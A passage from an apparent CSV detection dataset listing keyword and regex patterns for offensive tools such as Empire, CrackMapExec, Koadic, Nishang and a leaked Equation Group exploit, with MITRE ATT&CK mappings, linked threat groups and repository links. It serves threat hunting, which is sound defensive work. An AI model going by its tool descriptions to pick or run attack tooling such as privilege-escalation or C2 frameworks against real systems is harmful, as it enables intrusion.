T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43101" "*empire/server/downloads/logs/*",".{0,1000}empire\/server\/downloads\/logs\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens 
- FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43102" "*Empire@bc-security.org*",".{0,1000}Empire\@bc\-security\.org.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#email","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43103" "*empire_exec.py*",".{0,1000}empire_exec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting 
networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","43104" "*empire_server.*",".{0,1000}empire_server\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43105" "*empireadmin*",".{0,1000}empireadmin.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43106" "*empire-chain.pem*",".{0,1000}empire\-chain\.pem.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - 
T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43107" "*EmpireCORSMiddleware*",".{0,1000}EmpireCORSMiddleware.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - 
T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43108" "*Empire-GUI.git*",".{0,1000}Empire\-GUI\.git.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","43109" "*Empire-master*",".{0,1000}Empire\-master.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43110" "*empire-priv.key*",".{0,1000}empire\-priv\.key.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - 
T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43111" "*EmpireProject*",".{0,1000}EmpireProject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. 
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43112" "*Empire-Sponsors.git*",".{0,1000}Empire\-Sponsors\.git.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard 
Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43113" "*empire-test-kalirolling*",".{0,1000}empire\-test\-kalirolling.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43114" "*emptybowl.py*",".{0,1000}emptybowl\.py.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string 
passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","43115" "*-EmptyPassword-Users.txt*",".{0,1000}\-EmptyPassword\-Users\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","43116" "*Emulates a rightclick on the given coordinates*",".{0,1000}Emulates\sa\srightclick\son\sthe\sgiven\scoordinates.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","43117" "*enable_persistence.py*",".{0,1000}enable_persistence\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","43118" "*Enable_Privilege /Process:* /Privilege:*",".{0,1000}Enable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","43119" "*EnableAllParentPrivileges.c*",".{0,1000}EnableAllParentPrivileges\.c.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","43121" "*EnableAllParentPrivileges.exe*",".{0,1000}EnableAllParentPrivileges\.exe.{0,1000}","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. 
Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","43122" "*EnableAllTokenPrivs.exe.log*",".{0,1000}EnableAllTokenPrivs\.exe\.log.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","43123" "*Enabled_Users1.txt*",".{0,1000}Enabled_Users1\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","43124" "*Enable-DuplicateToken*",".{0,1000}Enable\-DuplicateToken.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43125" "*EnableRDesktopImplant*",".{0,1000}EnableRDesktopImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","43127" "*Enable-SeAssignPrimaryTokenPrivilege*",".{0,1000}Enable\-SeAssignPrimaryTokenPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43128" "*Enable-SeDebugPrivilege*",".{0,1000}Enable\-SeDebugPrivilege.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
